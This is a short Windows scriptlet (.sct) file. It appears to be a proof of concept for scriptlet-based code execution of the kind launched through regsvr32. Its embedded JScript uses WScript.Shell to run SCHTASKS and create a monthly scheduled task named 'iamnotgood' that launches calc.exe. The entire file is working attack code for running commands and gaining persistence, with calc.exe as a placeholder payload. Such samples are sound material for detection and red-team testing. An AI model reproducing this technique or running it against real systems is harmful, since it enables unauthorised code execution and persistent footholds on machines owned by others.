<?XML version="1.0"?>
<scriptlet>
<registration
  progid="TESTING"
  classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
  <script language="JScript">
    <![CDATA[
      var foo = new ActiveXObject("WScript.Shell").Run("SCHTASKS /Create /SC MONTHLY /MO first /D SUN /TN iamnotgood /TR c:\windows\system32\calc.exe"); 
    ]]>
</script>
</registration>
</scriptlet>
